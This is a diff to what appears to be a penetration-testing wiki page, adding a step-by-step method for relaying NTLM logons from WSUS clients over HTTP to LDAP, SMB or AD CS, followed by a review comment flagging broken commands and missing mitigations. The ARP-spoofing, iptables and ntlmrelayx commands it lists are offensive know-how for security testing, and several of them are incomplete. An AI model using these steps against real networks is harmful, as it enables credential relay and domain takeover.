diff --git a/src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md b/src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md index e0945ef75..464eea7e5 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md +++ b/src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md 
@@ -115,6 +115,67 @@ python MultiRelay.py -t -u ALL -d # Dump hashes These tools and techniques form a comprehensive set for conducting NTLM Relay attacks in various network environments. +### Abusing WSUS HTTP (8530) for NTLM Relay to LDAP/SMB/AD CS (ESC8) + +WSUS clients authenticate to their update server using NTLM over HTTP (8530) or HTTPS (8531). When HTTP is enabled, periodic client check-ins can be coerced or intercepted on the local segment and relayed with ntlmrelayx to LDAP/LDAPS/SMB or AD CS HTTP endpoints (ESC8) without cracking any hashes. This blends into normal update traffic and frequently yields machine-account authentications (HOST$). + +What to look for +- GPO/registry configuration under HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate and ...\WindowsUpdate\AU: + - WUServer (e.g., http://wsus.domain.local:8530) + - WUStatusServer (reporting URL) + - UseWUServer (1 = WSUS; 0 = Microsoft Update) + - DetectionFrequencyEnabled and DetectionFrequency (hours) +- WSUS SOAP endpoints used by clients over HTTP: + - /ClientWebService/client.asmx (approvals) + - /ReportingWebService/reportingwebservice.asmx (status) +- Default ports: 8530/tcp HTTP, 8531/tcp HTTPS + +Reconnaissance +- Unauthenticated + - Scan for listeners: nmap -sSVC -Pn --open -p 8530,8531 -iL + - Sniff HTTP WSUS traffic via L2 MITM and log active clients/endpoints with wsusniff.py (HTTP only unless you can make clients trust your TLS cert). +- Authenticated + - Parse SYSVOL GPOs for WSUS keys with MANSPIDER + regpol (wsuspider.sh wrapper summarises WUServer/WUStatusServer/UseWUServer). + - Query endpoints at scale from hosts (NetExec) or locally: + nxc smb -u -p -M reg-query -o PATH="HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate" KEY="WUServer" + reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate + +End-to-end HTTP relay steps +1) Position for MITM (same L2) so a client resolves the WSUS server to you (ARP/DNS poisoning, Bettercap, mitm6, etc.). 
Example with arpspoof: + arpspoof -i -t + +2) Redirect port 8530 to your relay listener (optional, convenient): + iptables -t nat -A PREROUTING -p tcp --dport 8530 -j REDIRECT --to-ports 8530 + iptables -t nat -L PREROUTING --line-numbers + +3) Start ntlmrelayx with the HTTP listener (requires Impacket support for HTTP listener; see PRs below): + ntlmrelayx.py -t ldap:// -smb2support -socks --keep-relaying --http-port 8530 + + Other common targets: + - Relay to SMB (if signing off) for exec/dump: -t smb:// + - Relay to LDAPS for directory changes (e.g., RBCD): -t ldaps:// + - Relay to AD CS web enrollment (ESC8) to mint a cert and then authenticate via Schannel/PKINIT: + ntlmrelayx.py --http-port 8530 -t http:///certsrv/certfnsh.asp --adcs --no-http-server + For deeper AD CS abuse paths and tooling, see the AD CS page: + +{{#ref}} +../../windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md +{{#endref}} + +4) Trigger a client check-in or wait for schedule. From a client: + wuauclt.exe /detectnow + or use the Windows Update UI (Check for updates). + +5) Use the authenticated SOCKS sessions (if -socks) or direct relay results for post-exploitation (LDAP changes, SMB ops, or AD CS certificate issuance for later authentication). + +HTTPS constraint (8531) +- Passive interception of WSUS over HTTPS is ineffective unless clients trust your certificate. Without a trusted cert or other TLS break, the NTLM handshake can’t be harvested/relayed from WSUS HTTPS traffic. + +Notes +- WSUS was announced deprecated but remains widely deployed; HTTP (8530) is still common in many environments. +- Useful helpers: wsusniff.py (observe HTTP WSUS check-ins), wsuspider.sh (enumerate WUServer/WUStatusServer from GPOs), NetExec reg-query at scale. +- Impacket restored HTTP listener support for ntlmrelayx in PR #2034 (originally added in PR #913). 
+ ### Force NTLM Logins In Windows you **may be able to force some privileged accounts to authenticate to arbitrary machines**. Read the following page to learn how: @@ -243,6 +304,14 @@ You now own **NT AUTHORITY\SYSTEM**. - [https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/](https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/) - [https://intrinium.com/smb-relay-attack-tutorial/](https://intrinium.com/smb-relay-attack-tutorial/) - [https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html) +- [WSUS Is SUS: NTLM Relay Attacks in Plain Sight (TrustedSec)](https://trustedsec.com/blog/wsus-is-sus-ntlm-relay-attacks-in-plain-sight) +- [GoSecure – Abusing WSUS to enable NTLM relaying attacks](https://gosecure.ai/blog/2021/11/22/gosecure-investigates-abusing-windows-server-update-services-wsus-to-enable-ntlm-relaying-attacks) +- [Impacket PR #2034 – Restore HTTP server in ntlmrelayx](https://github.com/fortra/impacket/pull/2034) +- [Impacket PR #913 – HTTP relay support](https://github.com/fortra/impacket/pull/913) +- [WSUScripts – wsusniff.py](https://github.com/Coontzy1/WSUScripts/blob/main/wsusniff.py) +- [WSUScripts – wsuspider.sh](https://github.com/Coontzy1/WSUScripts/blob/main/wsuspider.sh) +- [MS-WSUSOD – Windows Server Update Services: Server-to-Client Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-wsusod/e00a5e81-c600-40d9-96b5-9cab78364416) +- [Microsoft – WSUS deprecation announcement](https://techcommunity.microsoft.com/blog/windows-itpro-blog/windows-server-update-services-wsus-deprecation/4250436) {{#include ../../banners/hacktricks-training.md}}
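Review bot: the command placeholders in the Reconnaissance and relay steps of this hunk were lost when the angle-bracket tokens were rendered, so several commands are incomplete as written: `nmap -sSVC -Pn --open -p 8530,8531 -iL` has no input file, `arpspoof -i -t` names neither the interface nor the hosts, and `ntlmrelayx.py -t ldap:// -smb2support -socks --keep-relaying --http-port 8530` has no target host (the nxc `-u -p` line has the same problem). Put the commands in fenced code blocks as the rest of the page does, or escape the `<placeholder>` tokens so they survive rendering. In step 2, `iptables -t nat -A PREROUTING -p tcp --dport 8530 -j REDIRECT --to-ports 8530` redirects port 8530 to port 8530, which is a no-op; either drop the rule or state that it only matters when the listener port differs from the port clients connect to. The section also documents the weakness but not the fix: the text itself notes that HTTPS (8531) defeats interception and that SMB relay needs signing off, so add a short mitigation line recommending WSUS over HTTPS only with a certificate clients trust, SMB signing, LDAP signing and channel binding, and EPA on the AD CS web enrollment endpoint, plus a detection hint (machine-account HOST$ NTLM logons arriving from hosts that are not the WSUS server). A note that the WSUS deprecation announcement cited in the references does not remove existing HTTP-only deployments would also help readers prioritise.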